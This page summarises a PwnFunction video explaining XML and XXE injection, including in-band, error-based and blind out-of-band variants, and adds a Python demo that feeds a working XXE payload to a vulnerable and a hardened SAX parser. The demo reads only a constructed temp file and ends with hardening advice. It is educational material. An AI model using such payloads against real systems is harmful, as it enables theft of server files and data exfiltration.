XML External Entities (XXE) Explained

PwnFunction
28 Feb 2019, 20:11

Summary

TL;DR: In this video, PwnFunction explores XML and XML External Entity (XXE) injection. The tutorial begins with XML's structure and typical uses such as APIs and configuration files, then turns to its security weaknesses. It explains how XXE works: an attacker who controls XML input declares an external entity, and a parser that resolves it will read local files or issue network requests on the attacker's behalf. In-band, error-based and out-of-band (blind) XXE are covered, along with how parsers differ in what they will resolve. The video closes by noting how widely XML is parsed, and therefore how broad the impact of these flaws is.

Takeaways

  • 😀 XML stands for Extensible Markup Language and is used for data transportation and storage, unlike HTML, which focuses on data representation.
  • 😀 XML is human-readable and used in a variety of applications, including APIs, UI layouts, configuration files, and RSS feeds.
  • 😀 A well-formed XML document must have one and only one root element, with nested tags having specific syntactic rules.
  • 😀 XML entities act like variables and can store values to be reused throughout an XML document, which helps reduce redundancy.
  • 😀 There are three types of XML entities: general, parameter, and predefined entities, each serving different purposes.
  • 😀 External entities let a document pull in content from a local file or a remote URL; when a parser resolves them in attacker-supplied XML, that becomes an XXE vulnerability, most commonly arbitrary file read.
  • 😀 XXE attacks can be used to read local files, exfiltrate data, and even exploit external resources over the network.
  • 😀 In-band XXE allows attackers to see the output directly, whereas out-of-band XXE requires an external request to exfiltrate data.
  • 😀 External DTDs allow more flexibility with entities (for example, parameter entity references inside other entity declarations, which the internal DTD subset does not permit), so attackers load a DTD they control and chain entities to read files and carry the data further.
  • 😀 Blind XXE occurs when the server does not return the entity's content in its response; the attacker still exfiltrates data by making the parser send it in a request to a server the attacker controls.
  • 😀 XML is a complex and old technology, with varying behavior across different parsers, making it susceptible to various security vulnerabilities, including XXE attacks.

Q & A

  • What is the main purpose of XML?

    -XML (Extensible Markup Language) is primarily used for data transportation and sometimes for storage. Unlike HTML, which is about data representation, XML focuses on structuring and transporting data in a human-readable format.

  • What is the difference between XML and HTML?

    -HTML is focused on data representation, used for displaying data on web pages, whereas XML is focused on data transportation and storage, allowing for the exchange of data between systems in a flexible, structured format.

  • What are the syntactic rules for a valid XML document?

    -A well-formed XML document must have exactly one root element, every opening tag must be closed in the correct nesting order, tag names are case-sensitive, and the special characters `<`, `>`, `&`, `"` and `'` must be written as entities (`&lt;`, `&gt;`, `&amp;`, `&quot;`, `&apos;`) when they appear as data. Strictly speaking, "valid" additionally means the document conforms to its DTD or schema; the video uses the term loosely for well-formedness.

  • What are XML entities and how are they used?

    -XML entities act like variables that store values. They are defined in the document type definition (DTD) and can be referenced within the XML document to avoid repetition or handle special characters.

  • What are the types of XML entities?

    -There are three types of XML entities: general entities (referenced as `&name;` in the document body to store reusable values), parameter entities (referenced as `%name;` and usable only inside the DTD, where they make the DTD itself more flexible), and the five predefined entities (`&lt;`, `&gt;`, `&amp;`, `&quot;`, `&apos;`) for special characters.

  • What is an XML External Entity (XXE) attack?

    -XXE is an injection attack in which an attacker who controls XML input declares an external entity whose SYSTEM identifier points at a file or URL. If the parser resolves the entity, the attacker can read sensitive local files or make the server issue requests to arbitrary destinations.

  • How can XXE attacks lead to data exfiltration?

    -By manipulating external entities, an attacker can instruct the XML parser to fetch local files or external resources, thereby exfiltrating sensitive data such as password files or configuration files.

  • What is the difference between in-band, error-based, and out-of-band XXE attacks?

    -In in-band XXE the application reflects the expanded entity back in its response, so the attacker reads the data directly; error-based XXE coaxes the parser into including the data in an error message; out-of-band XXE is used when neither works, and the attacker makes the parser send the data to an external server the attacker controls.

  • How do external DTDs help in XXE attacks?

    -The internal DTD subset does not allow parameter entity references inside markup declarations, which blocks the entity chaining that exfiltration payloads need. By declaring an external DTD, the attacker has the parser load a DTD from a resource they control, and that DTD can contain entities that read files, wrap their contents, or build the outbound request used for exfiltration.

  • What is the role of CData in bypassing XML parser errors during XXE attacks?

    -A CDATA section (`<![CDATA[ ... ]]>`) tells the parser to treat its contents as plain text rather than markup. Files such as `/etc/fstab` contain characters like `<`, `>` or `&` that would otherwise break the parse when the entity is expanded; wrapping the file contents in a CDATA section via entities avoids those parsing errors. Because the wrapping concatenates parameter entities inside an entity declaration, this trick needs the external DTD described above.
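To make the file-read attack from the answers above concrete, here is an added example in Python; it is not code from the video. It writes a constructed stand-in for `/etc/passwd` into a temporary directory, builds the classic in-band XXE payload against it, and feeds that payload to two configurations of the standard-library `xml.sax` parser: one that resolves external general entities (the default before Python 3.7.1, and still the default in several other XML parsers), which leaks the file into the document text, and one that leaves them unresolved. The file name, element name and entity name are chosen for the demo.

```python
"""XXE demo: a SAX parser that fetches external entities versus one that does not.

Added example, not code from the PwnFunction video. The secret file and the
XML payload are constructed for the demo; nothing on the real system is read
except the file this script writes itself.
"""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler

# Constructed stand-in for a sensitive file such as /etc/passwd.
SECRET_CONTENT = "root:x:0:0:root:/root:/bin/bash\nsvc:x:1001:1001::/srv:/bin/false\n"


class TextCollector(handler.ContentHandler):
    """Collects the character data of the document, which is where an
    in-band XXE payload makes the parser splice in the file contents."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


def build_payload(file_url: str) -> bytes:
    """Classic in-band XXE payload: declare an external general entity whose
    SYSTEM identifier is a local file, then reference it in element content."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [\n'
        f'  <!ENTITY xxe SYSTEM "{file_url}">\n'
        ']>\n'
        '<data>&xxe;</data>\n'
    ).encode()


def parse_untrusted(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse attacker-controlled XML and return the document's text content.

    resolve_external_entities=True mirrors the xml.sax default before Python
    3.7.1: the parser follows the SYSTEM identifier and inlines the file.
    False is the hardened setting: external general entities are skipped.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except xml.sax.SAXException:
        # A hardened parser may reject the entity outright; for the demo,
        # treat that as "nothing leaked" rather than as a failure.
        return ""
    return collector.text


def demo() -> dict:
    """Write the constructed secret file, hit a vulnerable and a hardened
    parser with the same payload, and report what each one leaked."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = Path(tmp) / "passwd"  # demo file name, not the real /etc/passwd
        secret_path.write_text(SECRET_CONTENT)
        payload = build_payload(secret_path.as_uri())  # file:///... URL
        return {
            "vulnerable": parse_untrusted(payload, resolve_external_entities=True),
            "hardened": parse_untrusted(payload, resolve_external_entities=False),
        }


if __name__ == "__main__":
    for name, leaked in demo().items():
        print(f"{name}: {leaked!r}")
```

Run it directly to see the leaked text under the vulnerable configuration; the hardened parser returns an empty string because the entity reference is skipped. In production code, keep external entity resolution off (or use the `defusedxml` package, which refuses DTDs and entity expansion for the standard-library parsers). The out-of-band and blind variants discussed above use the same entity mechanism with an `http://` system identifier pointing at the attacker's server instead of a local file.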


Related tags
XML Security, XXE Attack, Cybersecurity, Data Exfiltration, Hacking Techniques, Vulnerability Testing, Security Exploits, API Security, XML Parsing, Web Application